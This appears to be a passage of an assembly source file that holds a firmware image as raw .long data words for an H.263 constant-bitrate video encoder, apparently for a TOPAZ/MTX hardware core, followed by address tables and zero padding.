0xc2006a4e .long 1883789855 ; 0x70485a1f .long 2426191872 ; 0x909cc000 .long 2720657936 ; 0xa229f210 .long 2833445448 ; 0xa8e2f248 .long 2829709840 ; 0xa8a9f210 .long 2860118536 ; 0xaa79f208 .long 3289554506 ; 0xc4129e4a .long 3490738244 ; 0xd0107044 .long 4061163778 ; 0xf2107102 .long 4061176361 ; 0xf210a229 .long 3670581793 ; 0xdac8a221 .long 1950787777 ; 0x7446a8c1 .long 2440347648 ; 0x9174c000 .long 148951249 ; 0x8e0d0d1 .long 1076475776 ; 0x4029b780 .long 3555793416 ; 0xd3f11a08 .long 3221236046 ; 0xc000294e .long 151687264 ; 0x90a9060 .long 2831872528 ; 0xa8caf210 .long 142767682 ; 0x8827642 .long 143839241 ; 0x892d009 .long 167933112 ; 0xa0274b8 .long 172150793 ; 0xa42d009 .long 183662664 ; 0xaf27848 .long 1143124773 ; 0x4422b325 .long 3221255746 ; 0xc0007642 .long 2662043892 ; 0x9eab90f4 .long 2594177012 ; 0x9a9ffff4 .long 2436939776 ; 0x9140c000 .long 240177297 ; 0xe50d091 .long 3536880906 ; 0xd2d0850a .long 2239668543 ; 0x857ea13f .long 2701382152 ; 0xa103d208 .long 2855391952 ; 0xaa31d2d0 .long 3221255426 ; 0xc0007502 .long 3501298020 ; 0xd0b19164 .long 3523742308 ; 0xd2080a64 .long 1950394497 ; 0x7440a881 .long 173330433 ; 0xa54d001 .long 718197729 ; 0x2aced3e1 .long 2856964752 ; 0xaa49d290 .long 3489756418 ; 0xd0017502 .long 3554740820 ; 0xd3e10a54 .long 3499174606 ; 0xd0912ace .long 3078622416 ; 0xb7800cd0 .long 1900560425 ; 0x71484029 .long 2431827968 ; 0x90f2c000 .long 2856178384 ; 0xaa3dd2d0 .long 3221254472 ; 0xc0007148 .long 42569832 ; 0x2899068 .long 2856442568 ; 0xaa41dac8 .long 1954353368 ; 0x747d10d8 .long 2436284416 ; 0x9136c000 .long 148951249 ; 0x8e0d0d1 .long 1076475776 ; 0x4029b780 .long 3221232136 ; 0xc0001a08 .long 1950650688 ; 0x74449140 .long 2436677632 ; 0x913cc000 .long 148951249 ; 0x8e0d0d1 .long 1076475776 ; 0x4029b780 .long 3555789320 ; 0xd3f10a08 .long 3499174606 ; 0xd0912ace .long 3078622416 ; 0xb7800cd0 .long 1900560425 ; 0x71484029 .long 2431827968 ; 0x90f2c000 .long 2856178384 ; 0xaa3dd2d0 .long 3221254472 ; 0xc0007148 .long 42569832 ; 0x2899068 .long 2730087120 ; 0xa2b9d2d0 .long 2730611208 ; 0xa2c1d208 .long 2428551177 ; 0x90c0c009 .long 1502394272 ; 0x598cb7a0 .long 2856186448 ; 0xaa3df250 .long 2838753808 ; 0xa933f210 .long 2830758416 ; 0xa8b9f210 .long 2837508618 ; 0xa920f20a .long 2847273488 ; 0xa9b5f210 .long 2846290440 ; 0xa9a6f208 .long 2309222928 ; 0x89a3f210 .long 2317480720 ; 0x8a21f310 .long 2881155664 ; 0xabbaf250 .long 4060613890 ; 0xf2080d02 .long 3222577697 ; 0xc014a221 .long 4065368743 ; 0xf2509aa7 .long 4060653911 ; 0xf208a957 .long 4060785185 ; 0xf20aaa21 .long 4077955404 ; 0xf310a94c .long 4060645409 ; 0xf2088821 .long 3254823098 ; 0xc200a8ba .long 4077935111 ; 0xf3105a07 .long 4064840225 ; 0xf2488a21 .long 142780705 ; 0x882a921 .long 1896009746 ; 0x7102d012 .long 134479880 ; 0x8040008 .long 3222427655 ; 0xc0125807 .long 2659348484 ; 0x9e827004 .long 1917109264 ; 0x7244c410 .long 4061164994 ; 0xf21075c2 .long 3221332138 ; 0xc001a0aa .long 3657994268 ; 0xda08901c .long 93301193 ; 0x58fa9c9 .long 3222539522 ; 0xc0140d02 .long 3501300353 ; 0xd0b19a81 .long 3523873382 ; 0xd20a0a66 .long 3759253760 ; 0xe011a900 .long 268603042 ; 0x10028ea2 .long 1073920512 ; 0x4002ba00 .long 3120562190 ; 0xba00000e .long 1948008450 ; 0x741c4002 .long 3003286838 ; 0xb3028536 .long 3657974904 ; 0xda084478 .long 4027689161 ; 0xf011a8c9 .long 4077947938 ; 0xf3108c22 .long 3492971041 ; 0xd0328221 .long 4061160386 ; 0xf21063c2 .long 4065372459 ; 0xf250a92b .long 3809520181 ; 0xe310aa35 .long 3254814895 ; 0xc20088af .long 1883789851 ; 0x70485a1b .long 2694967824 ; 0xa0a1f210 .long 1180218405 ; 0x4658b425 .long 2848643592 ; 0xa9cada08 .long 1573215680 ; 0x5dc55dc0 .long 4065330678 ; 0xf25005f6 .long 3657998770 ; 0xda08a1b2 .long 218278345 ; 0xd02a9c9 .long 2588983316 ; 0x9a50c014 .long 2856972816 ; 0xaa49f210 .long 4065359106 ; 0xf2507502 .long 3221266481 ; 0xc000a031 .long 3658518770 ; 0xda1090f2 .long 1962977865 ; 0x7500aa49 .long 2462236673 ; 0x92c2c001 .long 1494005536 ; 0x590cb720 .long 1093252992 ; 0x4129b780 .long 58946816 ; 0x3837500 .long 2470756353 ; 0x9344c001 .long 2854875720 ; 0xaa29f248 .long 3670570240 ; 0xdac87500 .long 3221268545 ; 0xc000a841 .long 4061172124 ; 0xf210919c .long 1611245985 ; 0x6009a9a1 .long 3517226625 ; 0xd1a49e81 .long 218257799 ; 0xd025987 .long 3222537622 ; 0xc0140596 .long 3670579755 ; 0xdac89a2b .long 2655692994 ; 0x9e4aa8c2 .long 277143552 ; 0x1084e000 .long 3004437024 ; 0xb3141220 .long 1963213868 ; 0x7504442c .long 2430255104 ; 0x90dac000 .long 2688670408 ; 0xa041dac8 .long 2470494208 ; 0x9340c000 .long 1891671627 ; 0x70c09e4b .long 2430386176 ; 0x90dcc000 .long 504680465 ; 0x1e14d011 .long 2449522688 ; 0x9200c000 .long 236245009 ; 0xe14d011 .long 2441134080 ; 0x9180c000 .long 2839796424 ; 0xa943dac8 .long 2856704712 ; 0xaa45dac8 .long 2149708560 ; 0x8021f310 .long 1494005728 ; 0x590cb7e0 .long 1510457856 ; 0x5a07c200 .long 2722224840 ; 0xa241dac8 .long 2859061768 ; 0xaa69d208 .long 3221255424 ; 0xc0007500 .long 3670577668 ; 0xdac89204 .long 1967041089 ; 0x753eaa41 .long 2427764736 ; 0x90b4c000 .long 3221259646 ; 0xc000857e .long 1962971328 ; 0x750090c0 .long 2426716160 ; 0x90a4c000 .long 3670574342 ; 0xdac88506 .long 4061176131 ; 0xf210a143 .long 1963108937 ; 0x7502aa49 .long 2431827968 ; 0x90f2c000 .long 2856966672 ; 0xaa49da10 .long 3221255424 ; 0xc0007500 .long 3523776994 ; 0xd20891e2 .long 1962977897 ; 0x7500aa69 .long 2453979136 ; 0x9244c000 .long 174117073 ; 0xa60d0d1 .long 2843922952 ; 0xa982d208 .long 2573598708 ; 0x9965fff4 .long 2436939776 ; 0x9140c000 .long 240177297 ; 0xe50d091 .long 3536880906 ; 0xd2d0850a .long 2239668543 ; 0x857ea13f .long 2701382152 ; 0xa103d208 .long 2855391952 ; 0xaa31d2d0 .long 3221255426 ; 0xc0007502 .long 3501298116 ; 0xd0b191c4 .long 3523742308 ; 0xd2080a64 .long 1950394497 ; 0x7440a881 .long 2430910464 ; 0x90e4c000 .long 2856442568 ; 0xaa41dac8 .long 3670542856 ; 0xdac80a08 .long 3503399489 ; 0xd0d1a241 .long 3523742304 ; 0xd2080a60 .long 3499206785 ; 0xd091a881 .long 142872144 ; 0x8840e50 .long 2697056776 ; 0xa0c1d208 .long 2827145736 ; 0xa882d208 .long 773772273 ; 0x2e1ed3f1 .long 687652878 ; 0x28fcc00e .long 3221254216 ; 0xc0007048 .long 3536884018 ; 0xd2d09132 .long 3555829950 ; 0xd3f1a8be .long 1883778590 ; 0x70482e1e .long 2424881152 ; 0x9088c000 .long 2697122312 ; 0xa0c2d208 .long 2837705232 ; 0xa923f210 .long 2831274504 ; 0xa8c1d208 .long 2150626064 ; 0x802ff310 .long 2696532688 ; 0xa0b9d2d0 .long 2720657936 ; 0xa229f210 .long 3509683458 ; 0xd1318502 .long 3509653072 ; 0xd1310e50 .long 4069526744 ; 0xf2900cd8 .long 3657998627 ; 0xda08a123 .long 3513884931 ; 0xd171a103 .long 3040874064 ; 0xb5400e50 .long 4069539899 ; 0xf290403b .long 3657998643 ; 0xda08a133 .long 3513884931 ; 0xd171a103 .long 3536850520 ; 0xd2d00e58 .long 3658000569 ; 0xda08a8b9 .long 4061176067 ; 0xf210a103 .long 4061176111 ; 0xf210a12f .long 3662717223 ; 0xda50a127 .long 3523780825 ; 0xd208a0d9 .long 3658525249 ; 0xda10aa41 .long 3080692301 ; 0xb79fa24d .long 3082780270 ; 0xb7bf7e6e .long 3084877550 ; 0xb7df7eee .long 3086974830 ; 0xb7ff7f6e .long 3221389294 ; 0xc0027fee .long 2619509760 ; 0x9c228c00 .long 3078661645 ; 0xb780a60d .long 4060632716 ; 0xf208568c .long 3074468111 ; 0xb740a90f .long 3074445572 ; 0xb7405104 .long 3793769356 ; 0xe220538c .long 3072360879 ; 0xb72081af .long 4060632212 ; 0xf2085494 .long 4031291790 ; 0xf048a18e .long 3760236737 ; 0xe020a8c1 .long 3074458407 ; 0xb7408327 .long 2656061149 ; 0x9e5046dd .long 3792728066 ; 0xe2107002 .long 159547567 ; 0x98280af .long 109249289 ; 0x6830309 .long 3040871045 ; 0xb5400285 .long 3221246228 ; 0xc0005114 .long 4060647768 ; 0xf2089158 .long 3525749293 ; 0xd226aa2d .long 3792722180 ; 0xe2105904 .long 3221260707 ; 0xc00089a3 .long 3658519008 ; 0xda1091e0 .long 4060654121 ; 0xf208aa29 .long 168339629 ; 0xa08a8ad .long 1631768627 ; 0x6142d033 .long 4061164213 ; 0xf21072b5 .long 3006564397 ; 0xb334882d .long 25773110 ; 0x1894436 .long 3221255360 ; 0xc00074c0 .long 3072365052 ; 0xb72091fc .long 3497089292 ; 0xd071590c .long 3254782526 ; 0xc2000a3e .long 2231785879 ; 0x85065997 .long 1102689600 ; 0x41b9b540 .long 1085125984 ; 0x40adb560 .long 2436939776 ; 0x9140c000 .long 1494005632 ; 0x590cb780 .long 3523773698 ; 0xd2088502 .long 2231542031 ; 0x8502a10f .long 2701652488 ; 0xa107f208 .long 1435809728 ; 0x5594b7c0 .long 2846546440 ; 0xa9aada08 .long 2840588880 ; 0xa94ff250 .long 2846480904 ; 0xa9a9da08 .long 1573477824 ; 0x5dc95dc0 .long 2175787552 ; 0x81afe220 .long 3222539522 ; 0xc0140d02 .long 3670579475 ; 0xdac89913 .long 4061175841 ; 0xf210a021 .long 3503401121 ; 0xd0d1a8a1 .long 3490187728 ; 0xd00809d0 .long 4060654177 ; 0xf208aa61 .long 1950656838 ; 0x7444a946 .long 2720125448 ; 0xa221d208 .long 2705519112 ; 0xa142f208 .long 2477047808 ; 0x93a4c000 .long 2854875664 ; 0xaa29f210 .long 3221255426 ; 0xc0007502 .long 3080753732 ; 0xb7a09244 .long 4064827788 ; 0xf248598c .long 160868949 ; 0x996aa55 .long 2846552648 ; 0xa9aaf248 .long 3254783234 ; 0xc2000d02 .long 4064827915 ; 0xf2485a0b .long 3222577753 ; 0xc014a259 .long 4064844015 ; 0xf24898ef .long 4061175849 ; 0xf210a029 .long 4064848477 ; 0xf248aa5d .long 3221267017 ; 0xc000a249 .long 4065366880 ; 0xf2509360 .long 4064848449 ; 0xf248aa41 .long 4061176409 ; 0xf210a259 .long 3662719198 ; 0xda50a8de .long 3624446271 ; 0xd808a93f .long 3074468449 ; 0xb740aa61 .long 4064827788 ; 0xf248598c .long 3658522830 ; 0xda10a0ce .long 4077955241 ; 0xf310a8a9 .long 4031283233 ; 0xf0488021 .long 3662717258 ; 0xda50a14a .long 142910013 ; 0x884a23d .long 2695485968 ; 0xa0a9da10 .long 2129573791 ; 0x7eeeb79f .long 2137962431 ; 0x7f6eb7bf .long 2146351071 ; 0x7feeb7df .long 2619509856 ; 0x9c228c60 .long 2216732189 ; 0x8420a61d .long 1452062592 ; 0x568cb780 .long 2828399112 ; 0xa895f208 .long 411344185 ; 0x18849d39 .long 2694181384 ; 0xa095f208 .long 2831863832 ; 0xa8cad018 .long 1418508064 ; 0x548cb720 .long 1984071042 ; 0x76428582 .long 3076562329 ; 0xb7609d99 .long 3221244065 ; 0xc00048a1 .long 4060647748 ; 0xf2089144 .long 4060651907 ; 0xf208a183 .long 3498090894 ; 0xd080a18e .long 3221266630 ; 0xc000a0c6 .long 3070267712 ; 0xb7009140 .long 3078641292 ; 0xb780568c .long 3498066476 ; 0xd080422c .long 3045106119 ; 0xb580a1c7 .long 3072344876 ; 0xb720432c .long 3078641292 ; 0xb780568c .long 3084931980 ; 0xb7e0538c .long 3084933524 ; 0xb7e05994 .long 4060627373 ; 0xf20841ad .long 4195395981 ; 0xfa10a98d .long 306097009 ; 0x123eab71 .long 3525574793 ; 0xd2240089 .long 4195375359 ; 0xfa1058ff .long 3758140137 ; 0xe000aae9 .long 123863906 ; 0x7620362 .long 258134019 ; 0xf62d003 .long 47374336 ; 0x2d2e000 .long 3489859282 ; 0xd00306d2 .long 3533835986 ; 0xd2a20ed2 .long 3263192588 ; 0xc2805e0c .long 3491780853 ; 0xd02058f5 .long 3263181080 ; 0xc2803118 .long 3758119180 ; 0xe000590c .long 355078442 ; 0x152a112a .long 488820739 ; 0x1d22d003 .long 1576321280 ; 0x5df4c100 .long 2647367256 ; 0x9dcb9e58 .long 3238043323 ; 0xc1009ebb .long 814242317 ; 0x30885a0d .long 1611184005 ; 0x6008b785 .long 4061175144 ; 0xf2109d68 .long 239975 ; 0x3a967 .long 3500438786 ; 0xd0a47502 .long 4077934719 ; 0xf310587f .long 3006499239 ; 0xb33389a7 .long 3042921508 ; 0xb55f4c24 .long 4195385188 ; 0xfa107f64 .long 4195394417 ; 0xfa10a371 .long 4195394281 ; 0xfa10a2e9 .long 4061175917 ; 0xf210a06d .long 4292125669 ; 0xffd4a3e5 .long 3076496156 ; 0xb75f9b1c .long 4026564452 ; 0xf0007f64 .long 1963240001 ; 0x7504aa41 .long 2453979136 ; 0x9244c000 .long 1401730848 ; 0x538cb720 .long 2849435712 ; 0xa9d6f040 .long 1118549856 ; 0x42abb760 .long 4061138178 ; 0xf2100d02 .long 428122594 ; 0x1984a1e2 .long 2554642452 ; 0x9844c014 .long 1452062592 ; 0x568cb780 .long 2686317128 ; 0xa01df248 .long 1452062464 ; 0x568cb700 .long 3040904450 ; 0xb5408502 .long 3080667580 ; 0xb79f41bc .long 3082780142 ; 0xb7bf7dee .long 3084877422 ; 0xb7df7e6e .long 3086974702 ; 0xb7ff7eee .long 3221389166 ; 0xc0027f6e .long 2619509792 ; 0x9c228c20 .long 1402255136 ; 0x5394b720 .long 2826360848 ; 0xa876d810 .long 2842685456 ; 0xa96ff010 .long 1121170688 ; 0x42d3b500 .long 2842554384 ; 0xa96df010 .long 1419032384 ; 0x5494b740 .long 1104000896 ; 0x41cdb780 .long 1502394208 ; 0x598cb760 .long 1104000320 ; 0x41cdb540 .long 2831800336 ; 0xa8c9d810 .long 2283926288 ; 0x8821f310 .long 486723603 ; 0x1d02d013 .long 2841964554 ; 0xa964f00a .long 2292441616 ; 0x88a3e210 .long 4031799875 ; 0xf0506243 .long 4077955437 ; 0xf310a96d .long 4027089441 ; 0xf0088221 .long 3040911973 ; 0xb540a265 .long 4027598285 ; 0xf01045cd .long 3045108337 ; 0xb580aa71 .long 4027597389 ; 0xf010424d .long 3038816501 ; 0xb520a8f5 .long 2619491021 ; 0x9c2242cd .long 1958789128 ; 0x74c0c008 .long 2656214616 ; 0x9e529e58 .long 2432483328 ; 0x90fcc000 .long 1891684354 ; 0x70c0d002 .long 1374886420 ; 0x51f31a14 .long 3221573651 ; 0xc0055013 .long 3221255168 ; 0xc0007400 .long 3489829116 ; 0xd00290fc .long 441479168 ; 0x1a507000 .long 19419155 ; 0x1285013 .long 1627699008 ; 0x6104b740 .long 1636611968 ; 0x618cb780 .long 1493488038 ; 0x5904d1a6 .long 3225460269 ; 0xc0409e2d .long 3358632165 ; 0xc830a8e5 .long 1883548237 ; 0x7044aa4d .long 3491586057 ; 0xd01d6009 .long 3491369492 ; 0xd01a1214 .long 3007336467 ; 0xb3405013 .long 304236730 ; 0x122248ba .long 2619494416 ; 0x9c225010 .long 1925234690 ; 0x72c0c002 .long 470470673 ; 0x1c0ad011 .long 39970 ; 0x9c22 .long 2277689353 ; 0x87c2c809 .long 203468896 ; 0xc20b060 .long 2277689353 ; 0x87c2c809 .long 174108768 ; 0xa60b060 .long 2277689353 ; 0x87c2c809 .long 163623008 ; 0x9c0b060 .globl _aui32H263CBR_MTXTOPAZFWData ; @aui32H263CBR_MTXTOPAZFWData .p2align 2 _aui32H263CBR_MTXTOPAZFWData: .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 2156921008 ; 0x809000b0 .long 2156921244 ; 0x8090019c .long 2189970532 ; 0x82884c64 .long 2189969756 ; 0x8288495c .long 2189969812 ; 0x82884994 .long 2189969854 ; 0x828849be .long 2189969872 ; 0x828849d0 .long 2189969932 ; 0x82884a0c .long 2189969980 ; 0x82884a3c .long 2189970028 ; 0x82884a6c .long 2189970068 ; 0x82884a94 .long 2189970132 ; 0x82884ad4 .long 2189970148 ; 0x82884ae4 .long 2189970164 ; 0x82884af4 .long 2189970172 ; 0x82884afc .long 2189970180 ; 0x82884b04 .long 2189970192 ; 0x82884b10 .long 2189970984 ; 0x82884e28 .long 2189970936 ; 0x82884df8 .long 2189970648 ; 0x82884cd8 .long 2189970240 ; 0x82884b40 .long 2189970728 ; 0x82884d28 .long 2189970800 ; 0x82884d70 .long 2189970804 ; 0x82884d74 .long 2189970796 ; 0x82884d6c .long 2189970872 ; 0x82884db8 .long 2189971656 ; 0x828850c8 .long 2189971423 ; 0x82884fdf .long 2189971424 ; 0x82884fe0 .long 2189971391 ; 0x82884fbf .long 2189971392 ; 0x82884fc0 .long 2189971456 ; 0x82885000 .long 2189971588 ; 0x82885084 .long 2189971144 ; 0x82884ec8 .long 2189971236 ; 0x82884f24 .long 2189971328 ; 0x82884f80 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 2156922588 ; 0x809006dc .long 2156927976 ; 0x80901be8 .long 2156930288 ; 0x809024f0 .long 2156922592 ; 0x809006e0 .long 2156936020 ; 0x80903b54 .long 2156937336 ; 0x80904078 .long 2156922668 ; 0x8090072c .long 0 ; 0x0 .long 2156928424 ; 0x80901da8 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 2156922588 ; 0x809006dc .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 2685407586 ; 0xa0101162 .long 2685403508 ; 0xa0100174 .long 2685407490 ; 0xa0101102 .long 2685403524 ; 0xa0100184 .long 2685407492 ; 0xa0101104 .long 2685403540 ; 0xa0100194 .long 2685407494 ; 0xa0101106 .long 2685403556 ; 0xa01001a4 .long 2685403554 ; 0xa01001a2 .long 2685403554 ; 0xa01001a2 .long 2685407618 ; 0xa0101182 .long 2685403458 ; 0xa0100142 .long 2685407522 ; 0xa0101122 .long 2685403474 ; 0xa0100152 .long 2148536612 ; 0x80101124 .long 2148536614 ; 0x80101126 .long 2148536644 ; 0x80101144 .long 2148536646 ; 0x80101146 .long 2148532598 ; 0x80100176 .long 2148532614 ; 0x80100186 .long 2148532630 ; 0x80100196 .long 2148532646 ; 0x801001a6 .long 2148532662 ; 0x801001b6 .long 2148532660 ; 0x801001b4 .long 2150630244 ; 0x80300364 .long 2148577536 ; 0x8010b100 .long 2148553056 ; 0x80105160 .long 2148532482 ; 0x80100102 .long 2816 ; 0xb00 .long 2816 ; 0xb00 .long 2976 ; 0xba0 .long 2976 ; 0xba0 .long 3 ; 0x3 .long 2 ; 0x2 .long 2 ; 0x2 .long 1 ; 0x1 .long 1 ; 0x1 .long 1 ; 0x1 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 5 ; 0x5 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 .long 0 ; 0x0 